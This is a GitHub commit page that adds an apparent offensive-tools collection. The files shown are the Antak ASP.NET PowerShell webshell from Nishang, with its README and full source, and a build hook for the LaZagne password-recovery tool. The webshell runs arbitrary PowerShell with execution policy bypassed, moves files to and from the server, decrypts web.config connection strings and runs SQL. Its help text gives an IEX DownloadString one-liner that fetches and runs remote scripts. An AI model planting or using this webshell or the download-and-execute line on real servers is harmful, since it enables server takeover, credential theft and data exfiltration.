-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
300 changed files
with
173,648 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,32 @@ | ||
| Antak is a webshell written in ASP.Net which utilizes PowerShell. | ||
| Antak is a part of Nishang and updates can be found here: | ||
| https://github.com/samratashok/nishang | ||
|
|
||
| Use this shell as a normal PowerShell console. Each command is executed in a new process; keep this in mind | ||
| while using commands (like changing current directory or running session aware scripts). | ||
|
|
||
| Executing PowerShell scripts on the target: | ||
|
|
||
| 1. Paste the script in command textbox and click 'Encode and Execute." A reasonably large script could be executed using this. | ||
|
|
||
| 2. Use PowerShell one-liner (example below) to download & execute in the command box. | ||
| IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here] | ||
|
|
||
| 3. Upload the script to the target and execute it. | ||
|
|
||
| 4. Make the script a semi-colon separated one-liner. | ||
|
|
||
| Files can be uploaded and downloaded using the respective buttons: | ||
|
|
||
| Uploading a file: | ||
| To upload a file, you must mention the actual path on the server (with write permissions) in the command text box. | ||
| (OS temporary directories like C:\Windows\Temp may be writable.) | ||
| Then, use the browse and upload buttons to upload file to that path. | ||
|
|
||
| Downloading a file: | ||
| To download a file, enter the actual path on the server in the command text box. | ||
| Then click on Download button. | ||
|
|
||
|
|
||
| A detailed blog post on Antak can be found here: | ||
| http://www.labofapenetrationtester.com/2014/06/introducing-antak.html |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,270 @@ | ||
| <%@ Page Language="C#" Debug="true" Trace="false" %> | ||
| <%@ Import Namespace="System.Diagnostics" %> | ||
| <%@ Import Namespace="System.IO" %> | ||
| <%@ Import Namespace="System.IO.Compression" %> | ||
| <%@ Import Namespace="Microsoft.VisualBasic" %> | ||
| <%--Antak - A Webshell which utilizes PowerShell.--%> | ||
|
|
||
| <script Language="c#" runat="server"> | ||
| protected void Login_Click(object sender, EventArgs e) | ||
| { | ||
| // WARNING: Don't be lazy, change values below for username and password. Default credentials are disastrous. | ||
| // Default Username is "Disclaimer" and Password is "ForLegitUseOnly" without quotes and case-sensitive. | ||
| if (Username.Text == "Disclaimer" && Password.Text == "ForLegitUseOnly") | ||
| { | ||
| execution.Visible = true; | ||
| execution.Enabled = true; | ||
| authentication.Visible = false; | ||
| output.Text = @"Welcome to Antak - A Webshell which utilizes PowerShell | ||
| Use help for more details. | ||
| Use clear to clear the screen."; | ||
| } | ||
| } | ||
| protected override void OnInit(EventArgs e) | ||
| { | ||
| execution.Visible = false; | ||
| execution.Enabled = false; | ||
| } | ||
| string do_ps(string arg) | ||
| { | ||
| //This section based on cmdasp webshell by http://michaeldaw.org | ||
| ProcessStartInfo psi = new ProcessStartInfo(); | ||
| psi.FileName = "powershell.exe"; | ||
| psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg; | ||
| psi.RedirectStandardOutput = true; | ||
| psi.UseShellExecute = false; | ||
| Process p = Process.Start(psi); | ||
| StreamReader stmrdr = p.StandardOutput; | ||
| string s = stmrdr.ReadToEnd(); | ||
| stmrdr.Close(); | ||
| return s; | ||
| } | ||
| void ps(object sender, System.EventArgs e) | ||
| { | ||
| string option = console.Text.ToLower(); | ||
| if (option.Equals("help")) | ||
| { | ||
| output.Text = @"Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind | ||
| while using commands (like changing current directory or running session aware scripts). | ||
| - Scripts can be executed on the target using any of the below methods: | ||
| 1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this. | ||
| 2. Use powershell one-liner (example below) for download & execute in the command box. | ||
| IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here] | ||
| 3. By uploading the script to the target and executing it. | ||
| 4. Make the script a semi-colon separated one-liner. | ||
| - Uploading a file: | ||
| To upload a file you must mention the actual path on server (with write permissions) in command textbox. | ||
| (OS temporary directory like C:\Windows\Temp may be writable.) | ||
| Then use Browse and Upload buttons to upload file to that path. | ||
| - Downloading a file: | ||
| To download a file enter the actual path on the server in command textbox. | ||
| Then click on Download button. | ||
| - SQL Queries could be executed by following below steps: | ||
| 1. Click on 'Parse Web.Config' button to get dabase connection string. By default, Antak looks for web.config in | ||
| the C:\Inetpub directory. You can specify a full path in the command box to look for web.config in other directory. | ||
| 2. Paste that connection string in the textbox besides the 'Execute SQL Query' button. | ||
| 3. Enter the SQL Query in the command box. | ||
| 4. Click the 'Execute SQL Query' button. | ||
| Antak is a part of Nishang and updates could be found here: | ||
| https://github.com/samratashok/nishang | ||
| Blog posts about Antak could be found here | ||
| http://www.labofapenetrationtester.com/search/label/Antak | ||
| "; | ||
| console.Text = string.Empty; | ||
| console.Focus(); | ||
| } | ||
| else if (option.Equals("clear")) | ||
| { | ||
| output.Text = string.Empty; | ||
| console.Text = string.Empty; | ||
| console.Focus(); | ||
| } | ||
| else | ||
| { | ||
| output.Text += "\nPS> " + console.Text + "\n" + do_ps(console.Text); | ||
| console.Text = string.Empty; | ||
| console.Focus(); | ||
| } | ||
| } | ||
| void execcommand(string cmd) | ||
| { | ||
| output.Text += "PS> " + "\n" + do_ps(cmd); | ||
| console.Text = string.Empty; | ||
| console.Focus(); | ||
| } | ||
| void base64encode(string inputstr) | ||
| { | ||
| // Compression and encoding directly stolen from Compress-PostScript by Carlos Perez | ||
| //http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html | ||
| string contents = console.Text; | ||
| if (inputstr != "null") | ||
| { | ||
| contents = inputstr; | ||
| } | ||
| // Compress Script | ||
| MemoryStream ms = new MemoryStream(); | ||
| DeflateStream cs = new DeflateStream(ms, CompressionMode.Compress); | ||
| StreamWriter sw = new StreamWriter(cs, ASCIIEncoding.ASCII); | ||
| sw.WriteLine(contents); | ||
| sw.Close(); | ||
| string code = Convert.ToBase64String(ms.ToArray()); | ||
| string command = "Invoke-Expression $(New-Object IO.StreamReader (" + | ||
| "$(New-Object IO.Compression.DeflateStream (" + | ||
| "$(New-Object IO.MemoryStream (," + | ||
| "$([Convert]::FromBase64String('" + code + "')))), " + | ||
| "[IO.Compression.CompressionMode]::Decompress))," + | ||
| " [Text.Encoding]::ASCII)).ReadToEnd();"; | ||
| execcommand(command); | ||
| } | ||
| protected void uploadbutton_Click(object sender, EventArgs e) | ||
| { | ||
| if (upload.HasFile) | ||
| { | ||
| try | ||
| { | ||
| string filename = Path.GetFileName(upload.FileName); | ||
| upload.SaveAs(console.Text + "\\" + filename); | ||
| output.Text = "File uploaded to: " + console.Text + "\\" + filename; | ||
| } | ||
| catch (Exception ex) | ||
| { | ||
| output.Text = "Upload status: The file could not be uploaded. The following error occured: " + ex.Message; | ||
| } | ||
| } | ||
| } | ||
| protected void downloadbutton_Click(object sender, EventArgs e) | ||
| { | ||
| try | ||
| { | ||
| Response.ContentType = "application/octet-stream"; | ||
| Response.AppendHeader("Content-Disposition", "attachment; filename=" + console.Text); | ||
| Response.TransmitFile(console.Text); | ||
| Response.End(); | ||
| } | ||
| catch (Exception ex) | ||
| { | ||
| output.Text = ex.ToString(); | ||
| } | ||
| } | ||
| protected void encode_Click(object sender, EventArgs e) | ||
| { | ||
| base64encode("null"); | ||
| } | ||
| // PowerShell logic in ConnectionStr_Click and executesql_Click taken from https://github.com/NetSPI/cmdsql | ||
| protected void ConnectionStr_Click(object sender, EventArgs e) | ||
| { | ||
| output.Text = @"By default, web.config is searched for in C:\inetpub. To look at other location, specify the full path in the command textbox. | ||
| "; | ||
| string webpath = "C:\\inetpub"; | ||
| if (console.Text != string.Empty) | ||
| { | ||
| webpath = console.Text; | ||
| } | ||
| string pscode = "$ErrorActionPreference = \'SilentlyContinue\';$path=" + "\"" + webpath + "\"" + ";" + "Foreach ($file in (get-childitem $path -Filter web.config -Recurse)) {; Try { $xml = [xml](get-content $file.FullName) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };if ($connstrings.ConnectionStrings.encrypteddata.cipherdata.ciphervalue -ne $null){;$tempdir = (Get-Date).Ticks;new-item $env:temp\\$tempdir -ItemType directory | out-null; copy-item $file.FullName $env:temp\\$tempdir;$aspnet_regiis = (get-childitem $env:windir\\microsoft.net\\ -Filter aspnet_regiis.exe -recurse | select-object -last 1).FullName + \' -pdf \"\"connectionStrings\"\" \' + $env:temp + \'\\\' + $tempdir;Invoke-Expression $aspnet_regiis; Try { $xml = [xml](get-content $env:temp\\$tempdir\\$file) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };remove-item $env:temp\\$tempdir -recurse};Foreach ($_ in $connstrings.ConnectionStrings.add) { if ($_.connectionString -ne $NULL) { write-host \"\"$file.Fullname --- $_.connectionString\"\"} } };"; | ||
| base64encode(pscode); | ||
| } | ||
| protected void executesql_Click(object sender, EventArgs e) | ||
| { | ||
| output.Text = @"Use a connection string retrieved from the server and copy it in the connection string textbox. | ||
| "; | ||
| string Constr = sqlconnectiostr.Text; | ||
| string sqlcmd = console.Text; | ||
| string pscode = "$Connection = New-Object System.Data.SQLClient.SQLConnection;$Connection.ConnectionString = " + "\"" + Constr + "\"" + ";" + "$Connection.Open();$Command = New-Object System.Data.SQLClient.SQLCommand;$Command.Connection = $Connection;$Command.CommandText = " + "\"" + sqlcmd + "\"" + ";" + "$Reader = $Command.ExecuteReader();while ($reader.Read()) {;New-Object PSObject -Property @{Name = $reader.GetValue(0)};};$Connection.Close()"; | ||
| base64encode(pscode); | ||
| } | ||
| </script> | ||
| <HTML> | ||
| <HEAD> | ||
| <title>Antak Webshell</title> | ||
| </HEAD> | ||
| <body bgcolor="#808080"> | ||
|
|
||
| <div> | ||
|
|
||
| <form id="Form1" method="post" runat="server" style="background-color: #808080"> | ||
| <asp:Panel ID="authentication" runat="server" HorizontalAlign="Center" > | ||
| <asp:TextBox ID="Username" runat="server" style="margin-left: 0px" Width="300px"></asp:TextBox> <br /> | ||
| <asp:TextBox ID="Password" runat="server" Width="300px"></asp:TextBox><br /> | ||
| <asp:Button ID="Login" runat="server" Text="Login" OnClick="Login_Click" Width="101px"/><br /> | ||
| </asp:Panel> | ||
| <asp:Panel ID="execution" runat="server" > | ||
| <div runat="server" style="text-align:center; resize:vertical"> | ||
|
|
||
| <asp:TextBox ID="output" runat="server" TextMode="MultiLine" BackColor="#012456" ForeColor="White" style="height: 526px; width: 891px;" ReadOnly="True"></asp:TextBox> | ||
| <asp:TextBox ID="console" runat="server" BackColor="#012456" ForeColor="Yellow" Width="891px" TextMode="MultiLine" Rows="1" onkeydown="if(event.keyCode == 13) document.getElementById('cmd').click()" Height="23px" AutoCompleteType="None"></asp:TextBox> | ||
|
|
||
|
|
||
| </div> | ||
| <div runat="server" style="width: auto; text-align:center"> | ||
|
|
||
| <asp:Button ID="cmd" runat="server" Text="Submit" OnClick="ps" /> | ||
| <asp:FileUpload ID="upload" runat="server"/> | ||
|
|
||
| <asp:Button ID="uploadbutton" runat="server" Text="Upload the File" OnClick="uploadbutton_Click" /> | ||
| <asp:Button ID="encode" runat="server" Text="Encode and Execute" OnClick="encode_Click"/> | ||
| <asp:Button ID="downloadbutton" runat="server" Text="Download" OnClick="downloadbutton_Click" /> <br /> | ||
| <asp:Button ID="ConnectionStr" runat="server" Text="Parse web.config" OnClick="ConnectionStr_Click"/> | ||
| <asp:Button ID="executesql" runat="server" Text="Execute SQL Query" OnClick="executesql_Click" /> | ||
| <asp:TextBox ID="sqlconnectiostr" runat="server" Width="352px">Enter Connection String here to Execute SQL Queries</asp:TextBox> | ||
| </div> | ||
|
|
||
| </asp:Panel > | ||
| </form> | ||
|
|
||
|
|
||
|
|
||
| </div> | ||
| </body> | ||
| </HTML> |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,9 @@ | ||
| from lazagne.config.manage_modules import get_modules_names | ||
| from lazagne.softwares.browsers.chromium_browsers import chromium_based_module_location | ||
| from lazagne.softwares.browsers.firefox_browsers import mozilla_module_location | ||
|
|
||
| all_hidden_imports_module_names = get_modules_names() + [mozilla_module_location, chromium_based_module_location] | ||
| hiddenimports = [package_name for package_name, module_name in all_hidden_imports_module_names] | ||
|
|
||
| if __name__ == "__main__": | ||
| print("\r\n".join(hiddenimports)) |
Oops, something went wrong.